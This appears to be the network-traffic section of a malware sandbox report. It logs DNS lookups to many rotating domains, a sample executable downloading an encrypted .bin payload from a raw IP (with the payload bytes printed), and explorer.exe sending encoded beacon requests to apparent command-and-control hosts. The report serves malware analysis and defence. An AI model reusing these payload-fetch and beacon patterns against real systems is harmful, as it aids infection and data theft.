Oct 11, 2023 22:58:13.054533005 CEST	192.168.11.20	9.9.9.9	0x6966	Standard query (0)	www.55dy5s.top	A (IP address)	IN (0x0001)	false
Oct 11, 2023 22:58:32.597459078 CEST	192.168.11.20	1.1.1.1	0xad3d	Standard query (0)	www.easyeats307.com	A (IP address)	IN (0x0001)	false
Oct 11, 2023 22:58:53.155508995 CEST	192.168.11.20	1.1.1.1	0x6016	Standard query (0)	www.doubleapus.com	A (IP address)	IN (0x0001)	false
Oct 11, 2023 22:59:13.807501078 CEST	192.168.11.20	1.1.1.1	0x6fa6	Standard query (0)	www.holzleisten24.shop	A (IP address)	IN (0x0001)	false
Oct 11, 2023 22:59:34.366415024 CEST	192.168.11.20	1.1.1.1	0x17a3	Standard query (0)	www.xlrj.asia	A (IP address)	IN (0x0001)	false
Oct 11, 2023 22:59:54.939002991 CEST	192.168.11.20	1.1.1.1	0xb2a8	Standard query (0)	www.fathomtackle.com	A (IP address)	IN (0x0001)	false
Oct 11, 2023 22:59:55.954035997 CEST	192.168.11.20	9.9.9.9	0xb2a8	Standard query (0)	www.fathomtackle.com	A (IP address)	IN (0x0001)	false
Oct 11, 2023 22:59:56.969362020 CEST	192.168.11.20	1.1.1.1	0xb2a8	Standard query (0)	www.fathomtackle.com	A (IP address)	IN (0x0001)	false
Oct 11, 2023 23:00:15.496933937 CEST	192.168.11.20	1.1.1.1	0x1bc9	Standard query (0)	www.digitalserviceact.online	A (IP address)	IN (0x0001)	false
Oct 11, 2023 23:00:36.055516005 CEST	192.168.11.20	1.1.1.1	0x4f11	Standard query (0)	www.ddbetting.com	A (IP address)	IN (0x0001)	false
Oct 11, 2023 23:00:56.612785101 CEST	192.168.11.20	1.1.1.1	0x56cf	Standard query (0)	www.ps212naming.com	A (IP address)	IN (0x0001)	false
Oct 11, 2023 23:01:17.157777071 CEST	192.168.11.20	1.1.1.1	0x4507	Standard query (0)	www.pwpholdings.com	A (IP address)	IN (0x0001)	false
Oct 11, 2023 23:01:37.697671890 CEST	192.168.11.20	1.1.1.1	0xb7c9	Standard query (0)	www.justinmburns.com	A (IP address)	IN (0x0001)	false
Oct 11, 2023 23:01:37.890511990 CEST	192.168.11.20	9.9.9.9	0xb7c9	Standard query (0)	www.justinmburns.com	A (IP address)	IN (0x0001)	false
Oct 11, 2023 23:02:18.813678026 CEST	192.168.11.20	1.1.1.1	0x3055	Standard query (0)	www.senior-living-91799.bond	A (IP address)	IN (0x0001)	false
Oct 11, 2023 23:02:39.355835915 CEST	192.168.11.20	1.1.1.1	0xe19a	Standard query (0)	www.riderarea.com	A (IP address)	IN (0x0001)	false
Oct 11, 2023 23:03:20.458049059 CEST	192.168.11.20	1.1.1.1	0xf137	Standard query (0)	www.ktrandnews.com	A (IP address)	IN (0x0001)	false
Oct 11, 2023 23:03:43.865729094 CEST	192.168.11.20	1.1.1.1	0xb45a	Standard query (0)	www.nala.dev	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 11, 2023 22:56:31.176006079 CEST	1.1.1.1	192.168.11.20	0xd1d1	No error (0)	www.los3.online		172.177.169.252	A (IP address)	IN (0x0001)	false
Oct 11, 2023 22:56:37.844975948 CEST	1.1.1.1	192.168.11.20	0x1eea	No error (0)	www.los3.online		172.177.169.252	A (IP address)	IN (0x0001)	false
Oct 11, 2023 22:56:50.705388069 CEST	1.1.1.1	192.168.11.20	0x16eb	No error (0)	www.start399.com		91.195.240.123	A (IP address)	IN (0x0001)	false
Oct 11, 2023 22:57:10.963449001 CEST	1.1.1.1	192.168.11.20	0x4464	No error (0)	www.niaeoer.com	name.shoplazza.store		CNAME (Canonical name)	IN (0x0001)	false
Oct 11, 2023 22:57:10.963449001 CEST	1.1.1.1	192.168.11.20	0x4464	No error (0)	name.shoplazza.store		104.18.233.42	A (IP address)	IN (0x0001)	false
Oct 11, 2023 22:57:10.963449001 CEST	1.1.1.1	192.168.11.20	0x4464	No error (0)	name.shoplazza.store		104.18.232.42	A (IP address)	IN (0x0001)	false
Oct 11, 2023 22:57:51.654177904 CEST	1.1.1.1	192.168.11.20	0x57ab	No error (0)	www.qualityquickprints.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Oct 11, 2023 22:58:13.182753086 CEST	1.1.1.1	192.168.11.20	0x6966	No error (0)	www.55dy5s.top		34.120.249.181	A (IP address)	IN (0x0001)	false
Oct 11, 2023 22:58:13.182753086 CEST	1.1.1.1	192.168.11.20	0x6966	No error (0)	www.55dy5s.top		34.149.24.8	A (IP address)	IN (0x0001)	false
Oct 11, 2023 22:58:13.453666925 CEST	9.9.9.9	192.168.11.20	0x6966	No error (0)	www.55dy5s.top		34.120.249.181	A (IP address)	IN (0x0001)	false
Oct 11, 2023 22:58:13.453666925 CEST	9.9.9.9	192.168.11.20	0x6966	No error (0)	www.55dy5s.top		34.149.24.8	A (IP address)	IN (0x0001)	false
Oct 11, 2023 22:58:32.769113064 CEST	1.1.1.1	192.168.11.20	0xad3d	Name error (3)	www.easyeats307.com	none	none	A (IP address)	IN (0x0001)	false
Oct 11, 2023 22:58:53.332053900 CEST	1.1.1.1	192.168.11.20	0x6016	Name error (3)	www.doubleapus.com	none	none	A (IP address)	IN (0x0001)	false
Oct 11, 2023 22:59:14.312978983 CEST	1.1.1.1	192.168.11.20	0x6fa6	No error (0)	www.holzleisten24.shop		130.185.109.77	A (IP address)	IN (0x0001)	false
Oct 11, 2023 22:59:35.091145039 CEST	1.1.1.1	192.168.11.20	0x17a3	No error (0)	www.xlrj.asia	0826.93cu.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 11, 2023 22:59:35.091145039 CEST	1.1.1.1	192.168.11.20	0x17a3	No error (0)	0826.93cu.com		154.12.93.8	A (IP address)	IN (0x0001)	false
Oct 11, 2023 22:59:57.613934994 CEST	1.1.1.1	192.168.11.20	0xb2a8	No error (0)	www.fathomtackle.com		154.197.227.142	A (IP address)	IN (0x0001)	false
Oct 11, 2023 22:59:57.613996029 CEST	1.1.1.1	192.168.11.20	0xb2a8	No error (0)	www.fathomtackle.com		154.197.227.142	A (IP address)	IN (0x0001)	false
Oct 11, 2023 22:59:58.322488070 CEST	9.9.9.9	192.168.11.20	0xb2a8	No error (0)	www.fathomtackle.com		154.197.227.142	A (IP address)	IN (0x0001)	false
Oct 11, 2023 23:00:16.031229019 CEST	1.1.1.1	192.168.11.20	0x1bc9	No error (0)	www.digitalserviceact.online		185.104.28.238	A (IP address)	IN (0x0001)	false
Oct 11, 2023 23:00:36.227343082 CEST	1.1.1.1	192.168.11.20	0x4f11	No error (0)	www.ddbetting.com	ddbetting.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 11, 2023 23:00:36.227343082 CEST	1.1.1.1	192.168.11.20	0x4f11	No error (0)	ddbetting.com		15.197.142.173	A (IP address)	IN (0x0001)	false
Oct 11, 2023 23:00:36.227343082 CEST	1.1.1.1	192.168.11.20	0x4f11	No error (0)	ddbetting.com		3.33.152.147	A (IP address)	IN (0x0001)	false
Oct 11, 2023 23:00:56.895217896 CEST	1.1.1.1	192.168.11.20	0x56cf	No error (0)	www.ps212naming.com		208.91.197.39	A (IP address)	IN (0x0001)	false
Oct 11, 2023 23:01:17.460161924 CEST	1.1.1.1	192.168.11.20	0x4507	No error (0)	www.pwpholdings.com	traff-6.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 11, 2023 23:01:17.460161924 CEST	1.1.1.1	192.168.11.20	0x4507	No error (0)	traff-6.hugedomains.com	hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 11, 2023 23:01:17.460161924 CEST	1.1.1.1	192.168.11.20	0x4507	No error (0)	hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com		18.119.154.66	A (IP address)	IN (0x0001)	false
Oct 11, 2023 23:01:17.460161924 CEST	1.1.1.1	192.168.11.20	0x4507	No error (0)	hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com		3.140.13.188	A (IP address)	IN (0x0001)	false
Oct 11, 2023 23:01:37.889991999 CEST	1.1.1.1	192.168.11.20	0xb7c9	Server failure (2)	www.justinmburns.com	none	none	A (IP address)	IN (0x0001)	false
Oct 11, 2023 23:01:38.072316885 CEST	9.9.9.9	192.168.11.20	0xb7c9	Server failure (2)	www.justinmburns.com	none	none	A (IP address)	IN (0x0001)	false
Oct 11, 2023 23:02:19.069736004 CEST	1.1.1.1	192.168.11.20	0x3055	No error (0)	www.senior-living-91799.bond		104.247.82.94	A (IP address)	IN (0x0001)	false
Oct 11, 2023 23:02:39.663219929 CEST	1.1.1.1	192.168.11.20	0xe19a	No error (0)	www.riderarea.com		52.20.84.62	A (IP address)	IN (0x0001)	false
Oct 11, 2023 23:03:21.207601070 CEST	1.1.1.1	192.168.11.20	0xf137	No error (0)	www.ktrandnews.com		158.247.235.89	A (IP address)	IN (0x0001)	false
Oct 11, 2023 23:03:44.373981953 CEST	1.1.1.1	192.168.11.20	0xb45a	No error (0)	www.nala.dev		38.242.133.61	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

103.72.68.128

www.start399.com

www.niaeoer.com

www.qualityquickprints.com

www.55dy5s.top

www.holzleisten24.shop

www.xlrj.asia

www.fathomtackle.com

www.digitalserviceact.online

www.ddbetting.com

www.ps212naming.com

www.pwpholdings.com

www.senior-living-91799.bond

www.riderarea.com

www.ktrandnews.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	50012	103.72.68.128	80	C:\Users\user\Desktop\MaMsKRmgXZ.exe

Timestamp	kBytes transferred	Direction	Data
Oct 11, 2023 22:55:50.644821882 CEST	0	OUT	GET /pcd/wAYOlXAIjrMljL79.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 103.72.68.128 Cache-Control: no-cache
Oct 11, 2023 22:55:51.007841110 CEST	1	IN	HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 20:55:49 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.2.34 Last-Modified: Tue, 10 Oct 2023 07:35:55 GMT ETag: "2e440-60757c1d2747a" Accept-Ranges: bytes Content-Length: 189504 Content-Type: application/octet-stream Data Raw: 54 24 84 94 0b f3 36 3e 12 b2 48 15 bc fa d2 ba 88 dd 53 23 cf b2 cf fb 09 58 5e d6 33 42 b3 c4 c0 07 5a 9e 3c 2c 7d 9a df ce 65 21 e8 b0 06 1e ff ab c1 df 86 de fe c7 70 a8 fd 27 13 10 04 3b de b5 6f bc 46 b3 e5 f3 f3 fd 34 7b 07 36 c5 72 d4 01 44 dd a8 59 d3 6e 06 b9 71 b1 b5 78 98 9d 62 c9 f6 82 3a 79 33 a3 27 9a c9 be 02 7b 53 48 e0 b3 ef 45 4c e7 dd 7d a9 5a 93 28 6c 20 df 10 12 da ca 21 53 fa 86 26 66 58 6c 66 44 a4 aa 40 4d 8a 33 31 1e 4b ab 40 2e 3b 95 cc 8e ff 00 f7 44 3e 74 de 4f 10 31 4b 90 e6 3a 26 f7 18 7a 74 28 f9 01 6c 0e ae ca db 1e 3f 99 00 35 9a 5d 9c b4 9d 10 b2 ef fe f2 ff b7 0d 48 20 d4 f0 0c e2 b6 a9 49 39 0e 80 4b 02 44 f4 07 e0 d3 4a 19 f0 75 37 60 49 1f e5 a7 87 84 f5 69 ed 13 35 1b 86 71 d0 ea 49 bd 84 d8 ae f8 9e 1d f8 9f 72 5e 94 49 e7 a4 b3 6e 9a 48 6a a3 a2 7b ca 7d 65 ec c6 a1 b8 c4 92 5d ae 81 85 ba 28 df 4a c5 b0 ea e8 5f 6f 1c b2 7d e8 90 45 bd fe 41 ce 60 75 fb 10 0e ca 50 ce ce 0d 2b 26 c5 ea 89 05 b9 23 45 28 18 ba 15 01 b4 6a d0 36 13 1c 24 eb 4b 5a b5 d0 ad ec 06 08 11 bf ce fa 70 9e b5 32 12 89 f3 b8 16 3b b0 53 82 8f 64 01 94 91 90 47 dc 46 09 66 b3 47 1b 6d f4 35 4c aa 4a 3e 0d c3 ea 9a 54 08 cf 09 ea e8 ca 28 89 aa af 56 fe 95 ac b6 75 92 ed 09 4b dc 9a 9b 3a 7c 82 c8 fa 8e a7 78 50 f3 22 19 1c 35 95 c9 34 eb 4a 52 e3 e4 69 b7 e6 0d 90 64 7f e0 0d cc 32 dc ac d3 aa a1 de 07 d6 93 bf 98 dc 23 30 69 b5 0f c5 e1 94 8f 1b 3b db 05 2c b9 70 e9 cd 53 52 66 ee ee 92 63 a8 9b a0 e8 f9 8a ec 37 0f 54 35 e0 01 95 66 4b 8b ae 2d 3d ac 97 65 44 d4 30 c2 22 f9 1e ff ad c4 1f ce 58 d7 06 d4 3e da 5e f4 7c 68 64 27 88 f7 7e 59 e2 6f 89 c7 d4 c9 b7 51 04 39 f5 20 28 f2 d5 fb 93 a3 67 eb c2 f3 17 1c 41 99 4d ed 91 3e 69 78 27 eb 47 e0 26 40 62 c2 f4 ff 93 d9 bb f6 6c ba 03 99 a2 fa 08 69 13 06 39 61 31 41 c9 5a 19 80 3f 0d 1c df 30 3b 6c a8 85 9b 1b 40 51 ad 81 d8 4e e9 97 54 b9 cd 54 d4 4d f3 f4 1a d4 aa 9f bb 30 0f 67 7f a3 2b 12 e2 c7 41 39 6f 37 0d 36 ba e6 90 cb 88 09 47 00 22 7e 56 3c df 7f c1 be bc 49 46 09 8a 16 4a ce 54 24 4f 18 69 36 41 06 bd 48 e5 75 6c 5c 1e 74 62 84 96 e4 c6 16 3d a4 06 30 5e 5c d9 28 80 b1 ce a7 b5 13 ee 90 dc 7f 1b ca 11 c0 10 35 d9 b8 06 36 14 75 75 ef 45 73 76 2d fb e2 84 5e 08 27 d2 8f f2 05 0b 9f 61 0e 48 54 51 96 20 d9 0a cf 87 82 95 84 93 d9 c9 c2 29 17 c1 a7 78 8e 73 e4 a3 83 fb c5 6f 44 2a 8b 1d 1f 32 71 e1 28 ac 82 7a 00 63 97 00 da 02 6c b3 9a fc 2f f9 87 c7 b8 49 de b5 52 eb 81 c3 e4 b0 8c 7c 63 a2 9e e2 9c eb 84 0c 99 fe 9a e9 47 1b 55 60 2a 81 56 09 83 fd e0 59 cb 17 90 3e a3 f1 e6 1e 44 a8 65 c8 bc 82 fb 5c a3 f1 68 7d cc 7f 3e 74 9f 61 d3 38 a6 bc 64 86 10 b7 e2 6d fc 1a bd 40 07 e4 0f 2f 6f a0 8c 58 72 84 f4 7a e8 18 94 d0 f7 8c ba 96 12 b3 d9 5e 21 7b 10 1c 36 6c f0 22 b5 e9 dd 18 41 3a ac 86 db 21 0e c8 9d e0 53 bb e2 d8 3f 60 e1 76 1f 33 52 a8 f9 84 0a f2 0b 13 b6 74 53 c6 fe 1b 99 40 0a 7b 59 d5 2a c0 cd df ba da d1 91 65 a1 f5 aa cc 89 e9 9a 43 bd 1a ff f6 6c 09 51 14 85 23 42 49 06 e0 11 5c e3 c4 05 b1 94 57 63 83 47 bf ae d5 02 2d 47 73 ff 77 97 ac 1d bb dc b6 78 09 85 78 c5 67 64 01 5f a7 a8 c7 c4 f1 Data Ascii: T$6>HS#X^3BZ<,}e!p';oF4{6rDYnqxb:y3'{SHEL}Z(l !S&fXlfD@M31K@.;D>tO1K:&zt(l?5]H I9KDJu7`Ii5qIr^InHj{}e](J_o}EA`uP+&#E(j6$KZp2;SdGFfGm5LJ>T(VuK:\|xP"54JRid2#0i;,pSRfc7T5fK-=eD0"X>^\|hd'~YoQ9 (gAM>ix'G&@bli9a1AZ?0;l@QNTTM0g+A9o76G"~V<IFJT$Oi6AHul\tb=0^\(56uuEsv-^'aHTQ )xsoD2q(zcl/IR\|cGU`VY>De\h}>ta8dm@/oXrz^!{6l"A:!S?`v3RtS@{Y*eClQ#BI\WcG-Gswxxgd_
Oct 11, 2023 22:55:51.007936001 CEST	3	IN	Data Raw: 07 32 bd 5e 78 44 65 f8 64 86 04 b0 05 56 f2 cc 4d fc e2 00 c4 52 86 9e 0e b9 6d 6b 07 8f bd 37 71 45 f8 c2 71 6a 93 c8 48 c7 8c b8 76 83 1b cb ea 21 f5 f9 a2 f1 e0 5d 56 df 29 51 7d 33 c4 bc a8 41 83 2f 5d a2 58 9a 93 0f f0 29 73 15 99 09 1c 90 Data Ascii: 2^xDedVMRmk7qEqjHv!]V)Q}3A/]X)sj<mJKF\|mEu0p9o-H9MI0\9^"#`\Psq{}nX2Aa(>/(4j"vUD,a+(gN~X]"h `v
Oct 11, 2023 22:55:51.007992029 CEST	4	IN	Data Raw: 5d 56 df 29 51 7d 33 c4 bc a8 41 83 2f 5d a2 58 9a 93 0f f0 29 73 15 99 09 1c 90 e4 dd 6a 1e ec a3 3c 6d f2 bc 4a 4b e3 89 46 05 fe 87 7c e2 a8 18 97 6d da f7 45 bf f8 ca 75 cf ad 83 30 81 d4 95 82 70 39 6f 7f e0 2d e2 08 48 cc c9 fc 39 88 9f 4d Data Ascii: ]V)Q}3A/]X)sj<mJKF\|mEu0p9o-H9MI0\9^"#`\Psq{}nX2Aa(>/(4j"vUD,a+(gN~X]"h `v'e`h#FUh'q[-=?M6j*
Oct 11, 2023 22:55:51.008085966 CEST	5	IN	Data Raw: f8 ca 75 cf ad 83 30 81 d4 95 82 70 39 6f 7f e0 2d e2 08 48 cc c9 fc 39 88 9f 4d 49 30 b5 19 c4 cf 01 f9 bd 93 92 fb 99 cc 1c 5c fb b0 e7 39 cf ae c0 cb 5e 22 ce 23 7f 60 8d dc d5 5c a5 50 73 71 7b bd 7d 6e f9 8a 58 32 41 e8 61 8f 1e 28 8a 13 3e Data Ascii: u0p9o-H9MI0\9^"#`\Psq{}nX2Aa(>/(4j"vUD,a+(gN~X]"h `v'e`h#FUh'q[-=?M6j*=P.yNTb:y3'{SHEL}Z( p/SN
Oct 11, 2023 22:55:51.369992018 CEST	7	IN	Data Raw: f4 2d 79 ed 82 54 94 1f 7f fa 36 b5 2a e3 8c 62 b0 97 bf 17 9e 04 4b c0 01 56 d2 a4 65 6f 48 23 70 4f fe 4e d8 16 e3 6d d0 f5 06 e4 dc 13 16 d8 59 a7 63 3c e8 a8 c9 a9 41 c1 1b 42 92 d3 18 a3 1d 8a b3 10 ce 4c 73 6f 3d 6e a3 22 04 94 6e 28 87 3d Data Ascii: -yT6bKVeoH#pONmYc<ABLso=n"n(=e6Z3plhsSB8t=yh,o \%{0!X:yBJktV8U.Y=]<',-P3";G\RuD*_
Oct 11, 2023 22:55:51.370032072 CEST	8	IN	Data Raw: ae a0 2a 2a 32 81 a7 aa 13 32 94 64 16 4a 93 df 1b f6 04 86 4d 3a 94 c2 dc fc 25 fa a5 48 fb 47 ed 53 bd 63 aa 0b df 90 68 39 f4 75 a0 d2 6e 80 c0 57 17 f8 c8 4e 91 1b 03 b6 4e 6b cd cd 37 ef 14 d5 11 c4 95 c3 bf 34 20 37 68 f1 42 57 c7 22 51 08 Data Ascii: **22dJM:%HGSch9unWNNk74 7hBW"QX/cQoF0mf6u&a6AM'6I2T8 `~YlT9d=TnA>Wti68TfHB\nC`@Oz=d~WU'i-
Oct 11, 2023 22:55:51.370531082 CEST	9	IN	Data Raw: 1b 1e 46 83 44 37 8f da 6e 10 d5 f3 a5 b8 f3 34 76 c9 4a 6c f1 cb d6 2a b9 fa 4a ad 56 67 af 95 ce 5a a2 89 d1 9c 65 62 9d 9f c4 b0 5e be b6 db da 65 36 f0 38 41 27 8f 65 cf 12 ba b3 f9 d7 77 bd 9d 16 a8 51 df 20 cb 55 8c e2 e8 d6 ca 72 14 b8 ea Data Ascii: FD7n4vJl*JVgZeb^e68A'ewQ Urk,B{-HHPu2+xrM6dBIf6[$W98G"DOPj\|dS0z#Fo@{'y?kl{\JJR$9mBkP8du,mRk
Oct 11, 2023 22:55:51.370573997 CEST	11	IN	Data Raw: cd 88 44 10 ba 65 8e 3d 34 6e df ff df 53 df 9b d8 d5 4b b7 aa 23 b9 70 14 2d 69 af 5f 4e 00 8a df db 06 6b 38 e2 d0 0b b7 37 a1 4a 50 84 af 36 01 f7 9b 6a 4c 90 9d 99 54 09 a8 93 83 33 a0 d6 ab f3 d9 84 b7 e7 26 43 26 c5 c0 8e ad bd 6a 9a 19 97 Data Ascii: De=4nSK#p-i_Nk87JP6jLT3&C&jfnaC7D :R~Nkz,UvB{}?kJh5+CO;mzvy:\|W7ogOK3}v>M?KgmNnJ/w8aW0[t
Oct 11, 2023 22:55:51.370606899 CEST	12	IN	Data Raw: 68 58 e6 48 d1 6a 4a a8 d6 bb d5 a5 47 ce a5 d3 3e 2e c5 f8 d7 49 b2 5d d8 e8 e6 9e e7 99 d1 5b 4d 81 dd e8 d7 66 c4 93 c8 91 ce 6e 01 fc 5e e2 d2 8d bb 20 67 9e ba 57 86 b6 7e f8 1a 05 57 bf 44 ba 2f 63 f5 ad 22 d2 d8 f8 f4 58 13 b6 42 a2 56 19 Data Ascii: hXHjJG>.I][Mfn^ gW~WD/c"XBV"Ytf0tQqQiRXG;/C4,:$5.o'qAC8<vK4'8GJ%7 5oN6_/O)y#$XoZ02sDnV2eUh#eYj
Oct 11, 2023 22:55:51.370654106 CEST	13	IN	Data Raw: 28 80 b6 80 24 11 9b 36 3d 41 04 47 8d 4b 42 b9 2c 32 58 ad 3a 2d 0c 35 13 2a 61 36 59 58 74 6f c6 b8 e7 de e7 34 25 8e ef 6b ad 39 21 0b 36 48 e0 2b 83 39 5a 3d a5 55 69 c6 18 ad 5c 0a 24 02 27 48 af ae 75 6d 75 38 4c 8d 6c 68 86 87 8b c8 0a 4c Data Ascii: ($6=AGKB,2X:-5*a6YXto4%k9!6H+9Z=Ui\$'Humu8LlhLrbd=9XJs+l^6UM;>gJ.vV9tJ!76TYIv9\-`=`)q$ :'kF"Th4rJ1[Y=
Oct 11, 2023 22:55:51.370975018 CEST	15	IN	Data Raw: 72 be b0 5b 3a 54 29 cb 22 9d e8 e8 5f e4 60 0a 79 29 57 4d 9e d0 cb b3 8c a4 04 08 8f dd ad ce ce 0d 58 7a 7d fe 02 78 45 12 1c 30 dc 45 1c 88 e9 9e 5b 6b e6 dd de fb ca bd 4a d0 ad 1c 8f 74 a9 b9 4f 19 8f 9e b5 32 9b d5 2b 3d d7 f4 b0 92 49 97 Data Ascii: r[:T)"_`y)WMXz}xE0E[kJtO2+=IWl?fGy[N(7R}TndtWA("3R4JRhvknRD]iN62-Lf?0a+vKA4 ,z@b(=

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	50015	91.195.240.123	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 11, 2023 22:56:51.023724079 CEST	203	OUT	GET /ro12/?pR-=GwGtW18azFWuCI/cWsMSGkvtLVgXrxrAejaoI1gQoBI/O/ZzRnUmOmWdpT96riJEH3vd&Wx=ChSLGhh0Mn9TylKP HTTP/1.1 Host: www.start399.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 11, 2023 22:56:51.372153997 CEST	204	IN	HTTP/1.1 200 OK date: Wed, 11 Oct 2023 20:56:51 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding x-powered-by: PHP/8.1.17 expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_VLzKS74+824+4HtmM9a+fAnHtwkPBgMegMeqkhbf2kFkxSkoy14LxCY7WFkmWCZeNlnfp/79rdEcxnr+har3uA== last-modified: Wed, 11 Oct 2023 20:56:51 GMT x-cache-miss-from: parking-697977dd84-w289q server: NginX connection: close Data Raw: 32 43 45 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 56 4c 7a 4b 53 37 34 2b 38 32 34 2b 34 48 74 6d 4d 39 61 2b 66 41 6e 48 74 77 6b 50 42 67 4d 65 67 4d 65 71 6b 68 62 66 32 6b 46 6b 78 53 6b 6f 79 31 34 4c 78 43 59 37 57 46 6b 6d 57 43 5a 65 4e 6c 6e 66 70 2f 37 39 72 64 45 63 78 6e 72 2b 68 61 72 33 75 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 73 74 61 72 74 33 39 39 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 73 74 61 72 74 33 39 39 20 52 65 73 6f 75 72 63 65 73 20 61 6e 64 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 73 74 61 72 74 33 39 39 2e 63 6f 6d 20 69 73 20 79 6f 75 72 20 66 69 72 73 74 20 61 6e 64 20 62 65 73 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_VLzKS74+824+4HtmM9a+fAnHtwkPBgMegMeqkhbf2kFkxSkoy14LxCY7WFkmWCZeNlnfp/79rdEcxnr+har3uA==><head><meta charset="utf-8"><title>start399.com - start399 Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="start399.com is your first and best source for all of the information youre looking for. From general t
Oct 11, 2023 22:56:51.372237921 CEST	206	IN	Data Raw: 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 73 74 61 72 74 33 39 39 2e 63 6f 6d 20 68 61 73 20 69 74 20 61 6c 6c 2e 20 57 65 20 68 Data Ascii: opics to more of what you would expect to find here, start399.com has it all. We hope you find what you arAECe searching for!"><link rel="icon" type="image/png" href="//img.sedoparking.com/templates/logos/sedo_logo.
Oct 11, 2023 22:56:51.372294903 CEST	207	IN	Data Raw: 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 Data Ascii: input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-webkit-appearance:button}butto
Oct 11, 2023 22:56:51.372349024 CEST	208	IN	Data Raw: 31 36 32 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 70 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 61 Data Ascii: 162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text-align:center}.container-b
